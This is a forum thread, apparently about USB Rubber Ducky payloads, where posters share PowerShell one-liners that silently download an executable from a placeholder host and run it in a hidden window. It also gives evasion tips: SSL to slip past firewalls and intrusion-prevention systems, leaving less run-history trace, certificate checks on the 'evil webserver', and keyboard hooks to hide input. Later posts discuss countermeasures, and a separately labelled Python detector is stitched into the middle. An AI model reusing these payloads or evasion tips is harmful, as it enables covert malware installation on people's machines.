[Payload] Powershell Download and execute modification


overwraith

Added a total of two words, but now powershell hides the window.

GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

Every little bit helps, right?

Here are my 2 cents...

powershell -w hidden (new-object system.net.webclient).downloadfile('https://xxx.com/1.x','%tmp%\1.exe');saps "%tmp%\1.exe"

That's a tiny bit shorter/faster...

Also, if your evil webserver has a valid certificate, then you can use SSL for the shellcode transfer as well. This would let it pass undetected through firewalls and IPSes that would potentially detect the shellcode in transit. Being trapped by an IPS is usually a game-over scenario since you raise all kinds of alarms, so this is something you usually want to avoid.

Having a valid SSL certificate is no problem for legit pentesting. I wouldn't want to sign a hack with my own certificates if I was doing anything illegal though ;-)

Another minor tweak... I don't know if it works, but just pressing the "GUI" key without "R" leaves less of a trace in the run history and may be faster... Haven't tested if it works though, and it may be theoretically a bit more unstable since you are executing based on a "search result". Normally you shouldn't find many matches though ;-)

Also I'd like to point out a few more tweaks and ideas:

1. Verify evil webserver's certificate so that you know that you aren't being tricked into a proxy / man-in-the-middle situation...

$w=[System.Net.WebRequest]::Create('https://xxx.com');$r=$w.GetResponse();if ($w.ServicePoint.Certificate){$Cert=[System.Security.Cryptography.X509Certificates.X509Certificate2]$w.ServicePoint.Certificate.Handle;$Chain=New-Object System.Security.Cryptography.X509Certificates.X509Chain;If(($r.ResponseUri -eq 'https://xxx.com/')-and($Chain.Build($Cert))){
powershell -w hidden (new-object system.net.webclient).downloadfile('https://xxx.com/1.x','%tmp%\1.exe');saps "%tmp%\1.exe"}}

The whole idea here is that you check the ResponseUri against an expected value so you know you are talking to the right server, and then verify the validity of the cert before you transfer the actual shellcode. The payload is getting quite big though (about 400 characters), so you might not want to use it all the time.

2. Don't know if you have already discussed this on the board, but system-wide keyboard hooks don't require admin access to install / run, and they don't need to be big (2-3k should do it, I believe). If you want to drop huge amounts of code, you could theoretically drop a system-wide keyboard hook on the system first, and have the keyboard send keystrokes through that keyboard filter only. This would let you input commands to any window, and if you filter it correctly, there is no way to intercept / see what's going on. Once the hooks are installed, there are no visible windows that spew out the payload etc.

3. With regards to countermeasures, there are a few options that are effective:

a. Antivirus will detect your shellcode if it has signatures for it.

b. Antivirus heuristics tend to trigger on a single parent process downloading code and then immediately executing. Some heuristic algorithms are actually quite hard to work around.

c. It is possible to detect and block rubber duckies with system wide keyboard hooks. You could for instance filter anything following a CTRL/ALT/WIN keypress against a blacklist, or even profile typing patterns and rate. This is not even hard to do.

Hope this was useful...

Edited by blazingmind
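As an added illustration of the heuristic in point 3b above (not code from this thread), here is a small Python detector that flags a PowerShell launch which downloads and immediately executes, optionally in a hidden window. The log records it parses use a simplified `Image|ParentImage|CommandLine` format that is constructed for the example and is not real Sysmon or 4688 output.

```python
import re

# Indicator families for the download-then-execute pattern; each entry is a
# list of case-insensitive regexes and a family counts as present if any matches.
INDICATORS = {
    "hidden_window": [r"-w(?:indowstyle)?\s+h(?:idden)?\b"],
    "download": [r"webclient", r"downloadfile", r"downloadstring",
                 r"invoke-webrequest", r"\biwr\b", r"invoke-restmethod"],
    "execute": [r"start-process", r"\bsaps\b", r"invoke-expression", r"\biex\b"],
    "temp_drop": [r"%te?mp%", r"\$env:te?mp\b", r"\\appdata\\local\\temp\\"],
}

# Constructed sample records (not real Sysmon output): Image|ParentImage|CommandLine.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=powershell -w hidden (new-object system.net.webclient).downloadfile('https://xxx.com/1.x','%tmp%\\1.exe');saps \"%tmp%\\1.exe\"",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=powershell Invoke-WebRequest https://xxx.com/report.csv -OutFile C:\\data\\report.csv",
]

def classify_command(cmd):
    """Return the set of indicator families found in one command line."""
    return {family for family, patterns in INDICATORS.items()
            if any(re.search(p, cmd, re.IGNORECASE) for p in patterns)}

def is_download_and_execute(cmd):
    """Heuristic: a download paired with execution, or a download in a hidden window."""
    found = classify_command(cmd)
    return "download" in found and ("execute" in found or "hidden_window" in found)

def scan_process_log(lines):
    """Parse the sample record format and return one alert per suspicious PowerShell launch."""
    alerts = []
    for line in lines:
        # maxsplit=2 keeps any '|' inside the command line intact
        fields = dict(part.split("=", 1) for part in line.split("|", 2))
        if not fields.get("Image", "").lower().endswith("powershell.exe"):
            continue
        cmd = fields.get("CommandLine", "")
        if is_download_and_execute(cmd):
            alerts.append({"parent": fields.get("ParentImage", ""),
                           "indicators": sorted(classify_command(cmd)),
                           "command": cmd})
    return alerts

if __name__ == "__main__":
    for alert in scan_process_log(SAMPLE_LOG):
        print(alert["parent"], alert["indicators"])
```

Only the first record trips the rule; the plain download to a data directory and the script-file launch are left alone, which is the kind of allowance for normal user activity the next reply mentions.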

Nifty stuff, makes me wish I had, and knew how to use a web server.

Concerning the countermeasures,

Shellcode can be obfuscated, heuristic algorithms have to allow some user activity, and system wide keyboard hooks can also be thwarted by using alternate key sequences to execute the same procedure, and possibly custom firmware that allows for human speed data input.

It's all just a continuum of moves and counter moves, just like everything else in war, virology, and attack vectors.
